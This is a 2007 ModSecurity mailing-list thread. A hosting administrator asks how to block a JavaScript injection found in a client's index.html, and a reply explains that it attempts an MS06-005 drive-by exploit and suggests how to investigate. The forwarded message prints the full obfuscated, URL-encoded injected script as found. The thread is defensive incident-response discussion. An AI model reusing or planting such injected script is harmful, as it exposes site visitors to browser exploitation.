[Modsecurity] Some type of file injection vuln going around

Ryan Barnett rcbarnett at gmail.com
Tue Oct 9 10:18:57 EDT 2007 

This malicious JS is attempting to have the client's browser make multiple
requests to loop through a few systems and eventually tries to exploit the
MS06-005 vulnerability -
http://www.microsoft.com/technet/security/Bulletin/MS06-005.mspx by
downloading a specially crafted WMV file.

Now, to answer you questions -
1) You need to try and identify how this JS code was added to the html
page.  Was it uploaded through the website in a comment form/blog post,
etc...?  Or was it added by a local user who could have uploaded a new html
page or edited the file locally from a command shell on the web server?  In
the former case, if you have the ModSecurity SecAuditEngine turned On, then
you can do some quick grepping through the audit logs to identify any
transactions that have this data present.

2) As for ModSecurity rules, the Core Rules (
http://www.modsecurity.org/projects/rules/index.html) have numerous rules
that will identify clients who are attempting to upload this type of
malicious code.  Identifying/blocking this type of data going OUTBOUND in
the html sent to clients is a bit more difficult.  See this recent OWASP
presentation on Crimeware -
http://www.owasp.org/images/8/83/OWASP_IL_8_Evasive_Crimeware_attacks_Business_drivers_and_Proposed.pdf.
Breach is working on rules to help identify this type of malicious code to
help hosting environments.  Check out the www.modsecurity.org site for
details.

-- 
Ryan C. Barnett
ModSecurity Community Manager
Breach Security: Director of Application Security Training
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
Author: Preventing Web Attacks with Apache


---------- Forwarded message ----------
From: admin at efastservers.com < admin at efastservers.com>
Date: Oct 8, 2007 12:48 PM
Subject: [Modsecurity] Some type of file injection vuln going around
To: modsecurity at gotroot.com



One of my resellers contacted me today stating that one of his websites was
hacked and possibly the server. He wanted to know what we were going to do
about it.

I checked the server but no other website is affected except for two of his
own websites.



There seems to be some type of javascript file injection vuln going around.
I searched the logs but could not find anything obvious in his logs. I
checked all sites and they are clean.



Here is what was injected into his index.html file after the <header> tag.



</html>
<!--[z0s]--><script>do

cument.write
(unescape("%3Cscript%3Eif%28wA%21%3D1%29%7Bfunction%20Qg%28gx%29%7Breturn%20gx%7Dtry%7Bfunction%20UNc%28IDB%29%7Br

eturn%20parseInt%28IDB%29%7Dvar%20zmW%3D%27aavalvaLvahvaSvanvagvaIva9vaRvaMvaivaxvaCvadvajvaova7vaVvaJvaOvabvaHvamvawvaevaWvaN

vakvazva6vaYvatvaXvaPvaUvapvaFva3vaBvayvaqvafvarvaZvacvaDvaTvaGva5vasva4va8vaKvlavllvlLvlhvlSvlnvlgvlIvl9vlRvlMvlivlxvlCvldvlj

vlovl7vlVvlJvlOvlbvlHvlmvlw%27%3Bvar%20uNq%3DQg%28%27v%27%29%2CHCR%3DArray%2827751%5E27867%2CUNc%28%27243%27%29%2CUNc%28%27227

%27%29%2CUNc%28%27242%27%29%2CUNc%28%27233%27%29%2C9751%5E9959%2CUNc%28%27244%27%29%2CUNc%28%27190%27%29%2CUNc%28%27230%27%29%

2CUNc%28%27245%27%29%2C10675%5E10589%2C936%5E839%2C21887%5E21983%2CUNc%28%27210%27%29%2C21801%5E22001%2C21825%5E21993%2C5220%5

E5301%2CUNc%28%27201%27%29%2C22845%5E22929%2CUNc%28%27202%27%29%2C16044%5E15945%2CUNc%28%27169%27%29%2CUNc%28%27251%27%29%2C10

351%5E10393%2CUNc%28%27225%27%29%2CUNc%28%27204%27%29%2C10454%5E10245%2CUNc%28%27189%27%29%2CUNc%28%27247%27%29%2C4863%5E4667%

2C29566%5E29637%2CUNc%28%27206%27%29%2CUNc%28%27226%27%29%2C15905%5E16015%2C32317%5E32489%2C618%5E647%2C32760%5E32543%2CUNc%28

%27171%27%29%2CUNc%28%27184%27%29%2CUNc%28%27182%27%29%2C20297%5E20477%2CUNc%28%27176%27%29%2CUNc%28%27228%27%29%2CUNc%28%2723

5%27%29%2CUNc%28%27162%27%29%2CUNc%28%27248%27%29%2CUNc%28%27199%27%29%2CUNc%28%27205%27%29%2CUNc%28%27253%27%29%2CUNc%28%2719

5%27%29%2C30514%5E30613%2CUNc%28%27177%27%29%2CUNc%28%27250%27%29%2C15088%5E14857%2CUNc%28%27213%27%29%2CUNc%28%27236%27%29%2C

UNc%28%27197%27%29%2CUNc%28%27175%27%29%2CUNc%28%27232%27%29%2CUNc%28%27207%27%29%2CUNc%28%27173%27%29%2CUNc%28%27186%27%29%2C

UNc%28%27161%27%29%2C9002%5E9109%2C2844%5E3015%2C11165%5E11075%2C31322%5E31459%2C7836%5E7745%2CUNc%28%27220%27%29%2CUNc%28%271

93%27%29%2C3893%5E3975%2C20421%5E20231%2CUNc%28%27138%27%29%2CUNc%28%27217%27%29%2C24184%5E24243%2CUNc%28%27179%27%29%2CUNc%28

%27181%27%29%2CUNc%28%27183%27%29%2C6089%5E5987%29%3Bvar%20CVS%2ClXs%3Bvar%20QVT%2CMKq%3D%27aaalaLahaSanagaIa9aRaMaLagaSaiaMax

aCadajaoa7aVaJaOabaHaxamawahaxaeaWaNaMaOakaxazawagaOajaba6amawahaxaxaYataNaxaMaOakaxazawagaOajaba6axaYataXalaOagaPaSaUaOajaeaW

aXapaOagaPaSaUaOajabaFa3aBayaqaqaqaqaqaba6axafaiaLaRaUaOaMagaXaLaiaiaraSaOaxaNaxaoa7aFaZaNaZaFaOalaLawanaOajaJaOabaFaZa6aOacan

aSahaOalaNaZaFaYataXagaiaDaTaPaWagahaSaMapajaba6axaGamawahaxaRa5aNasala4a9a5a8asaVaWaKaNasa4asa6amawahaxadlaaNasaRanafawagaOa4

aXaLllawalalaSaLagaOllaXaiahapasaVaOlLaNaslhlSagaUlllhasa6aSa9ajafaiaLaRaUaOaMagaXaLaiaiaraSaOaXaSaMafaOaclna9ajaRa5aFasaNasaF

aWaKabaxaNaNlga4abaHamawahaxaflllSaNafaiaLaRaUaOaMagaXllaiaLawagaSaiaMaXlSaialaga6amawahaxlSaraNaxaslSagasaFasaganlIasaFaslhlh

asaFajaxaflllSaxl9aNaxasaslRasaslIaWlaajababaxaFaxaflllSaXahaOanllawaLaOaxajlhlMliawlga8aqlglxaXlglClhaVasaXasabaXahaOanllawaL

aOaxajlhldaXaFlhaVasaXasabaFasaXasaFaWlaajabaxaFasaXasaxaFaxadlaaFaOlLa6amawahaxaDaRaNafaiaLaRaUaOaMagaXaLahaOawagaOlLllaOaUaO

aMagajasaSa9ahawaUaOasaba6aDaRaXalaOagljagagahaSataRagaOaxajasalahaLasaVaxlSaraba6aDaRaXlSaOaSaplSagaNa4a6aDaRaXakaSafaglSaNlo

a6aDaRaXa9ahawaUaOl7aiahafaOahaxaNaxaqa6axagahaKaHaxafaiaLaRaUaOaMagaXataiafaKaXawananaOaMafa5lSaSllafaxajaxaDaRaba6axaCadajaR

a5aVaxaWaKaxaba6aGaxaLawagaLlSajaOabaxaHafaiaLaRaUaOaMagaXakahaSagaOaxajasaalSagaUllaIaaataiafaKaIaalhataiafaKaIaalhlSagaUllaI

asaba6axafaiaLaRaUaOaMagaXataiafaKaXawananaOaMafa5lSaSllafaxajaxaDaRaba6aCadaxajaxaRa5aVaWaKabaxa6aGaxaGlVa9aRaMaLagaSaiaMaxaW

laajabaHaxamawahaxlJlOaNloayaVamaoaNaZaqa4lolbaylHaBlma3lxaqawataLafaOa9aZa6amawahaxafazaNaZaZa6axa9aiahajatagaNaqa6axatagaxaa

axlJlOa6axatagaFaFabaxafazaFaNaxamaoaXalaRatalagahajaTawaglSaXa9llaiaiahajaTawaglSaXahawaMafaiaUajablwamaoaXllaOaMapaglSabaVa4

aVa4aba6axahaOagaRahaMaxafaza6axaGaalhalaLahaSanagaI%27%3Bvar%20Hui%3DString%28%29%3BzmW%3DzmW.split%28uNq%29%3Bfor%20%28CVS%3

D0%3BCVS%3CMKq.length%3BCVS+%3D2%29%7BQVT%3DMKq.substr%28CVS%2C2%29%3Bfor%28lXs%3D0%3BlXs%3CzmW.length%3BlXs++%29%7Bif%28zmW%5

BlXs%5D%3D%3DQVT%29break%3B%7DHui+%3DString.fromCharCode%28HCR%5BlXs%5D%5E128%29%3B%7Ddocument.write%28Hui%29%3B%7Dcatch%28VMj

%29%7B%7D%7Dvar%20wA%3D1%3C/script%3E"))</script><!--[/z0s]-->



There is a small discussion about this at
http://groups.google.com/group/stopbadware/browse_thread/thread/69bac2aaac70e4d5/26405b950d361a23



Is there a mod_sec rule that can stop this?



Thanks

_______________________________________________
Modsecurity mailing list
Modsecurity at gotroot.com
http://lists.gotroot.com/mailman/listinfo/modsecurity
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.gotroot.com/pipermail/modsecurity/attachments/20071009/f584f38c/attachment.html

More information about the Modsecurity mailing list